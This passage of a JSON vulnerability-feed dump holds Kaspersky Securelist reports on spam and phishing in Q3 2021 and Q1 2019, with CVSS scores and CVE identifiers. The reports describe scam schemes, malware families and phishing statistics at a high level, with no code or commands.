"securelist", "title": "Spam and phishing in 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2023-02-16T08:00:07", "id": "SECURELIST:49E48EDB41EB48E2FCD169A511E8AACD", "href": "https://securelist.com/spam-phishing-scam-report-2022/108692/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-01T16:36:08", "description": "\n\n## Quarterly highlights\n\n### Scamming championship: sports-related fraud\n\nThis summer and early fall saw some major international sporting events. The delayed Euro 2020 soccer tournament was held in June and July, followed by the equally delayed Tokyo Olympics in August. Q3 2021 also featured several F1 Grand Prix races. There was no way that cybercriminals and profiteers could pass up such a golden opportunity. Fans wanting to attend events live encountered fake ticket-selling websites. Some sites made a point of stressing the tickets were &quot;official&quot;, despite charging potential victims several times the [real price of a ticket](<https://www.kaspersky.ru/blog/ofitsialnye-bilety-v-teatr/25890/>), and some just took the money and disappeared.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123731/Spam_report_Q3_2021_01.png>)\n\nScammers also laid traps for those preferring to watch the action online from the comfort of home. Fraudulent websites popped up offering free live broadcasts. On clicking the link, however, the user was asked to pay for a subscription. If that did not deter them, their money and bank card details went straight to the scammers, with no live or any other kind of broadcast in return. This scheme has been used many times before, only instead of sporting events, victims were offered the hottest movie and TV releases.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123806/Spam_report_Q3_2021_02.png>)\n\nSoccer video games always attract a large following. This success has a downside: gaming platforms get attacked by hackers, especially during major soccer events. Accordingly, the Euro 2020 championship was used by scammers as bait to hijack accounts on the major gaming portal belonging to Japanese gaming giant Konami. The cybercriminals offered users big bonuses in connection with the tournament. However, when attempting to claim the bonus, the victim would land on a fake Konami login page. If they entered their credentials, the attackers took over their account and the &quot;bonus&quot; evaporated into thin air.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123923/Spam_report_Q3_2021_03.png>)\n\n&quot;Nigerian prince&quot; scammers also had a close eye on Q3&#x27;s sporting fixture. The e-mails that came to our attention talked about multi-million-dollar winnings in Olympics-related giveaways. To receive the prize, victims were asked to fill out a form and e-mail it to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124024/Spam_report_Q3_2021_04.png>)\n\nSome messages anticipated upcoming events in the world of sport. The FIFA World Cup is slated for far-off November \u2014 December 2022, yet scammers are already inventing giveaways related to it.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124115/Spam_report_Q3_2021_05.png>)\n\nAmong other things, we found some rather unusual spam e-mails with an invitation to bid for the supply of products to be sold at airports and hotels during the World Cup. Most likely, the recipients would have been asked to pay a small commission to take part in the bidding or giveaway, with no results ever coming forth.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124200/Spam_report_Q3_2021_06.png>)\n\n### Scam: get it yourself, share with friends\n\nIn Q3 2021, our solutions blocked more than 5.6 million redirects to phishing pages. Anniversaries of well-known brands have become a favorite topic for attackers. According to announcements on fake sites, IKEA, Amazon, Tesco and other companies all held prize draws to celebrate a milestone date. Wannabe participants had to perform a few simple actions, such as taking a survey or a spot-the-hidden-prize contest, or messaging their social network contacts about the promotion, and then were asked to provide card details, including the CVV code, to receive the promised payout. That done, the attackers not only got access to the card, but also requested payment of a small commission to transfer the (non-existent) winnings. Curiously, the scammers came up with fake round dates, for example, the 80th anniversary of IKEA, which in reality will come two years later. It is always advisable to check promotions on official websites, rather than trusting e-mails, which are easy to spoof.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124249/Spam_report_Q3_2021_07.png>)\n\nThere were also plenty of &quot;holiday deals&quot; supposedly from major Russian brands, with some, it seemed, showing particular generosity in honor of September 1, or Knowledge Day, when all Russian schools and universities go back after the summer break. Those companies allegedly giving away large sums were all related to education in one way or another. At the same time, the fraudulent scheme remained largely the same, with just some minor tinkering round the edges. For example, fake Detsky Mir (Children&#x27;s World, a major chain of kids&#x27; stores) websites promised a fairly large sum of money, but on condition that the applicant sends a message about the &quot;promotion&quot; to 20 contacts or 5 groups. And the payment was then delayed, allegedly due to the need to convert dollars into rubles: for this operation, the &quot;lucky ones&quot; had to pay a small fee.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124402/Spam_report_Q3_2021_08.png>)\n\nOn a fake website holding a giveaway under the Perekrestok brand, after completing the tasks the &quot;winner&quot; was promised as a prize a QR code that could supposedly be used to make purchases in the company&#x27;s stores. Note that Perekrestok does indeed issue coupons with QR codes to customers; that is, the cybercriminals tried to make the e-mail look plausible. When trying to retrieve this code, the potential victim would most likely be asked to pay a &quot;commission&quot; before being able to spend the prize money. Note too that QR codes from questionable sources can carry other threats, for example, spreading malware or debiting money in favor of the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124531/Spam_report_Q3_2021_09.png>)\n\nIn 2021, there was an increase in the number of fake resources posing as cookie-selling platforms. Users were promised a generous monetary reward (up to $5,000 a day) for selling such data. Those who fell for the tempting offer and followed the link were redirected to a fake page that allegedly &quot;reads cookies from the victim&#x27;s device to estimate their market value.&quot; The &quot;valuation&quot; most often landed in the US$700\u20132,000 range. To receive this money, the user was asked to put the cookies up at a kind of auction, in which different companies were allegedly taking part. The scammers assured that the data would go to the one offering the highest price.\n\nIf the victim agreed, they were asked to link their payment details to the account in the system and to top it up by \u20ac6, which the scammers promised to return, together with the auction earnings, within a few minutes. To top up the balance, the victim was required to enter their bank card details into an online form. Naturally, they received no payment, and the \u20ac6 and payment details remained in the attackers&#x27; possession.\n\nNote that the very idea of selling cookies from your device is risky: these files can store confidential information about your online activity \u2014 in particular, login details that let you avoid having to re-enter your credentials on frequently used sites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124600/Spam_report_Q3_2021_10-scaled-1.jpeg>)\n\nEven in official mobile app stores, malware can sometimes sneak in. As such, this quarter saw a new threat in the shape of fraudulent welfare payment apps that could be downloaded on such platform. The blurb described them as software that helps find and process payments from the government that the user is entitled to. Due payments (fake, of course) were indeed found, but to receive the money, the user was requested to &quot;pay for legal services relating to form registration&quot;. The numerous positive reviews under the application form, as well as the design mimicking real government sites, added credibility. We informed the store in question, which they removed the fraudulent apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124627/Spam_report_Q3_2021_11.png>)\n\n### Spam support: call now, regret later\n\nE-mails inviting the recipient to contact support continue to be spam regulars. If previously they were dominated by IT topics (problems with Windows, suspicious activity on the computer, etc.), recently we have seen a rise in the number of e-mails talking about unexpected purchases, bank card transactions or account deactivation requests. Most likely, the change of subject matter is an attempt to reach a wider audience: messages about unintentional spending and the risk of losing an account can frighten users more than abstract technical problems. However, the essence of the scam remained the same: the recipient, puzzled by the e-mail about a purchase or transfer they did not make, tried to call the support service at the number given in the message. To cancel the alleged transaction or purchase, they were asked to give their login credentials for the site from where the e-mail supposedly came. This confidential information fell straight into the hands of the cybercriminals, giving them access to the victim&#x27;s account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124650/Spam_report_Q3_2021_12.png>)\n\n### COVID-19\n\nNew life was injected into the COVID-19 topic this quarter. In connection with mass vaccination programs worldwide, and the introduction of QR codes and certificates as evidence of vaccination or antibodies, fraudsters began &quot;selling&quot; their own. We also encountered rogue sites offering negative PCR test certificates. The &quot;customer&quot; was asked first to provide personal information: passport, phone, medical policy, insurance numbers and date of birth, and then to enter their card details to pay for the purchase. As a result, all this information went straight to the malefactors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124714/Spam_report_Q3_2021_13.png>)\n\nSpam in the name of generous philanthropists and large organizations offering lockdown compensation is already a standard variant of the &quot;Nigerian prince&quot; scam.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124741/Spam_report_Q3_2021_14.png>)\n\nHowever, &quot;Nigerian prince&quot; scams are not all that might await recipients of such messages. For example, the authors of spam exploiting Argentina&#x27;s BBVA name had a different objective. Users were invited to apply for government subsidy through this bank. To do so, they had to unpack a RAR archive that allegedly contained a certificate confirming the compensation. In reality, the archive harbored malware detected by our solutions as Trojan.Win32.Mucc.pqp.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124803/Spam_report_Q3_2021_15.png>)\n\nCybercriminals also used other common COVID-19 topics to trick recipients into opening malicious attachments. In particular, we came across messages about the spread of the delta variant and about vaccination. The e-mail headers were picked from various information sources, chosen, most likely, for their intriguing nature. The attached document, detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>), contained a macro for running a PowerShell script. SAgent malware is used at the initial stage of the attack to deliver other malware to the victim&#x27;s system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124828/Spam_report_Q3_2021_16.png>)\n\n### Corporate privacy\n\nA new trend emerged this quarter in spam e-mails aimed at stealing credentials for corporate accounts, whereby cybercriminals asked recipients to make a payment. But upon going to the website to view the payment request, the potential victims were requested to enter work account login details. If they complied, the attackers got hold of the account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124852/Spam_report_Q3_2021_17.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn Q3 2021, the share of spam in global mail traffic fell once again, averaging 45.47% \u2014 down 1.09 p.p. against Q2 and 0.2 p.p. against Q1.\n\n_Share of spam in global mail traffic, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131406/01-en-spam-report-q3.png>))_\n\nIn July, this indicator fell to its lowest value since the beginning of 2021 (44.95%) \u2014 0.15 p.p. less than in March, the quietest month of H1. The highest share of spam in Q3 was seen in August (45.84%).\n\n### Source of spam by country\n\nThe top spam-source country is still Russia (24.90%), despite its share dropping slightly in Q3. Germany (14.19%) remains in second place, while China (10.31%) moved into third this quarter, adding 2.53 p.p. Meanwhile, the US (9.15%) shed 2.09 p.p. and fell to fourth place, while the Netherlands held on to fifth (4.96%).\n\n_Source of spam by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131453/03-en-spam-report-q3.png>))_\n\nOn the whole, the TOP 10 countries supplying the bulk of spam e-mails remained virtually unchanged from Q2. Sixth position still belongs to France (3.49%). Brazil (2.76%) added 0.49 p.p., overtaking Spain (2.70%) and Japan (2.24%), but the TOP 10 members remained the same. At the foot of the ranking, as in the previous reporting period, is India (1.83%).\n\n### Malicious mail attachments\n\nMail Anti-Virus this quarter blocked more malicious attachments than in Q2. Our solutions detected 35,958,888 pieces of malware, over 1.7 million more than in the previous reporting period.\n\n_Dynamics of Mail Anti-Virus triggerings, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131519/04-en-spam-report-q3.png>))_\n\nDuring the quarter, the number of Mail Anti-Virus triggerings grew: the quietest month was July, when our solutions intercepted just over 11 million attempts to open an infected file, while the busiest was September, with 12,680,778 malicious attachments blocked.\n\n#### Malware families\n\nIn Q3 2021, Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family (9.74%) were again the most widespread malware in spam. Their share increased by 3.09 p.p. against the last quarter. These Trojans are designed to steal login credentials from the victim&#x27;s device. The share of the [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) family, which consists of various malware disguised as electronic documents, decreased slightly, pushing it into second place. Third place was taken by the [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (5.19%), whose 32-bit [relatives](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.71%) moved down to ninth. Meanwhile, the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family, which creates malicious tasks in Task Scheduler, finished fourth this time around, despite its share rising slightly.\n\n_TOP 10 malware families in mail traffic, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131546/05-en-spam-report-q3.png>))_\n\nThe sixth place in TOP 10 common malware families in spam in Q3 was occupied by [exploits for the CVE-2018-0802 vulnerability](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (3.28%), a new addition to the list. This vulnerability affects the Equation Editor component, just like the older but still popular (among cybercriminals) CVE-2017-11882, [exploits for which](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (3.29%) were the fifth most prevalent in Q3. Seventh position went to malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images (2.97%), and eighth to [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%). Loaders from the [Agent](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>) family again propped up the ranking (1.69%).\n\nThe TOP 10 most widespread e-mail malware in Q3 was similar to the families ranking. The only difference is that ninth place among individual samples is occupied by Trojan-PSW.MSIL.Stealer.gen stealers.\n\n_TOP 10 malicious attachments in spam, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131613/06-en-spam-report-q3.png>))_\n\n#### Countries targeted by malicious mailings\n\nIn Q3, Mail Anti-Virus was most frequently triggered on the computers of users in Spain. This country&#x27;s share again grew slightly relative to the previous reporting period, amounting to 9.55%. Russia climbed to second place, accounting for 6.52% of all mail attachments blocked from July to September. Italy (5.47%) rounds out TOP 3, its share continuing to decline in Q3.\n\n_Countries targeted by malicious mailings, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131639/07-en-spam-report-q3.png>))_\n\nBrazil (5.37%) gained 2.46 p.p. and moved up to fourth position by number of Mail Anti-Virus triggerings. It is followed by Mexico (4.69%), Vietnam (4.25%) and Germany (3.68%). The UAE (3.65%) drops to eighth place. Also among the TOP 10 targets are Turkey (3.27%) and Malaysia (2.78%).\n\n## Statistics: phishing\n\nIn Q3, the Anti-Phishing system blocked 46,340,156 attempts to open phishing links. A total of 3.56% of Kaspersky users encountered this threat.\n\n### Geography of phishing attacks\n\nBrazil had the largest share of affected users (6.63%). The TOP 3 also included Australia (6.41%) and Bangladesh (5.42%), while Israel (5.33%) dropped from second to fifth, making way for Qatar (5.36%).\n\n_Geography of phishing attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131707/08-en-spam-report-q3.png>))_\n\n### Top-level domains\n\nThe top-level domain most commonly used for hosting phishing pages in Q3, as before, was COM (29.17%). Reclaiming second place was XYZ (14.17%), whose share increased by 5.66 p.p. compared to the previous quarter. ORG (3.65%) lost 5.14 p.p. and moved down to fifth place, letting both the Chinese domain CN (9.01%) and TOP (3.93%) overtake it.\n\n_Top-level domain zones most commonly used for phishing, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131734/09-en-spam-report-q3.png>))_\n\nThe Russian domain RU (2.60%) remained the sixth most popular among cybercriminals in Q3, while the last four lines of the TOP 10 are occupied by the international domains NET (2.42%), SITE (1.84%), ONLINE (1.40%) and INFO (1.11%).\n\n### Organizations under phishing attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nGlobal internet portals (20.68%) lead the list of organizations whose brands were most often used by cybercriminals as bait. Online stores (20.63%) are in second place by a whisker. Third place, as in the last quarter, is taken by banks (11.94%), and fourth by payment systems (7.78%). Fifth and sixth positions go to the categories &quot;Social networks and blogs&quot; (6.24%) and &quot;IMs&quot; (5.06%), respectively.\n\n_Distribution of organizations whose users were targeted by phishers, by category, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131759/10-en-spam-report-q3.png>))_\n\nThe seventh line is occupied by online games (2.42%). Note that for the past two years websites in this category have featured in the TOP 10 baits specifically in the third quarter. Financial services (1.81%), IT companies (1.72%) and telecommunication companies (1.45%) round out the ranking.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn Q3 2021, Safe Messaging blocked 117,854 attempted redirects via phishing links in various messengers. Of these, 106,359 links (90.25%) were detected and blocked in WhatsApp messages. Viber accounted for 5.68%, Telegram for 3.74% and Google Hangouts for 0.02% of all detected links.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131830/11-en-spam-report-q3.png>))_\n\nOn WhatsApp, Safe Messaging detected an average of 900 phishing links per day during the quarter. There was a surge in scamming activity in this period, though \u2014 on July 12\u201316 the system blocked more than 4,000 links a day. This spike coincided with an increase in detections of the Trojan.AndroidOS.Whatreg.b Trojan, which registers new WhatsApp accounts from infected devices. We cannot say for sure what exactly these accounts get up to and whether they have anything to do with the rise in phishing on WhatsApp, but it is possible that cybercriminals use them for spamming.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132007/Spam_report_Q3_2021_18.png>)\n\n**_Dynamics of phishing activity on WhatsApp, Q3 2021_**\n\nAs for Telegram, phishing activity there increased slightly towards the end of the quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132044/Spam_report_Q3_2021_19.png>)\n\n**_Dynamics of phishing activity on Telegram, Q3 2021_**\n\n## Takeaways\n\nNext quarter, we can expect Christmas- and New Year-themed mailings. Ahead of the festive season, many people make purchases from online stores, a fact exploited by cybercriminals. Anonymous fake stores taking money for non-existent or substandard goods are likely to be a popular scamming method during this period. Also beware of fraudulent copies of big-name trading platforms \u2014 such sites traditionally mushroom ahead of the festive frenzy. Corporate users too should remain sharp-eyed \u2014 even a congratulatory e-mail seemingly from a partner may be phishing for confidential information.\n\nThe COVID-19 topic will still be hot in the next quarter. The fourth wave of the pandemic, vaccinations and the introduction of COVID passports in many countries will surely give rise to new malicious mailings. Also be on the lookout for websites offering compensation payments: if previous quarters are anything to go by, cybercriminals will continue to find new and enticing ways to lure their victims.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-01T12:00:26", "type": "securelist", "title": "Spam and phishing in Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2021-11-01T12:00:26", "id": "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "href": "https://securelist.com/spam-and-phishing-in-q3-2021/104741/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:29:15", "description": "\n\n## Quarterly highlights\n\n### Valentine's Day\n\nAs per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png>)\n\nBut most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim's payment details being sent to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png>)\n\n### New Apple products\n\nLate March saw the unveiling of Apple's latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.\n\n_Growth in the number of attempts to redirect users to phishing Apple sites before the presentation _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143724/apple-en.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png>)\n\n_Fake Apple ID login pages_\n\nScammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png>)\n\n### Fake technical support\n\nFake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png>)\n\n_Fake \"Kaspersky Lab support service\" accounts_\n\nAll these profiles that we detected in Q1 have one thing in common: they offer assistance in matters related to one or another company products, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. Not only do users not have their issue resolved, they are likely to be defrauded as well.\n\n### New Instagram \"features\"\n\nLast year, we [wrote](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/>) that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full \u2014 not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.\n\nCybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png>)\n\nAs usual in such schemes, the \"buyer\" is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png>)\n\n### Mailshot phishing\n\nIn Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization form.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png>)\n\n### Financial spam through the ACH system\n\nIn Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png>)\n\n### \"Dream job\" offers from spammers \n\nIn Q3, we [registered spam messages](<https://securelist.com/spam-and-phishing-in-q3-2018/88686/>) containing \"dream job\" offers. This quarter, we logged another major mailing topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the \"cloud service,\" the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim's machine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png>)\n\n### Ransomware and cryptocurrency\n\nAs we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of \"sextortion\" \u2014 a topic we [wrote about last year](<https://securelist.com/spam-and-phishing-in-2018/93453/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png>)\n\nIn Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.\n\nThe fictitious employee, whose name varied from message to message, claimed to have found the victim's details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the \"employee\" happened to know that the victim was a well-off individual with a reputation to protect \u2014 for which a payment of 10,000 dollars in bitcoin was demanded.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png>)\n\nPlaying on people's fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.\n\n### Malicious attacks on the corporate sector\n\nIn Q1, the [corporate sector of the Runet was hit by a malicious spam attack](<https://www.kaspersky.ru/blog/phishing-wave-shade/22251/>). The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png>)\n\nWe also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png>)\n\n### Attacks on the banking sector\n\nBanks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender's address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message \u2014 for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message. The email itself stated that the bank had introduced some new security features that required an update of the account details to use.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png>)\n\nThe link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14144003/spam-world-en.png>)\n\nIn Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.\n\n_Proportion of spam in Runet mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143939/spam-russia-en.png>)\n\nPeak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143819/countries-source-en.png>)\n\nAs is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). The Top 10 is rounded off by Vietnam (2.18%).\n\n### Spam email size\n\n_Spam email size, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143628/spam-size.png>)\n\nIn Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2\u20135 KB messages fell to 8.27% (down 3.15 p.p.). 10\u201320 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20\u201350 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).\n\n### Malicious attachments: malware families\n\n_TOP 10 malicious families in mail traffic, 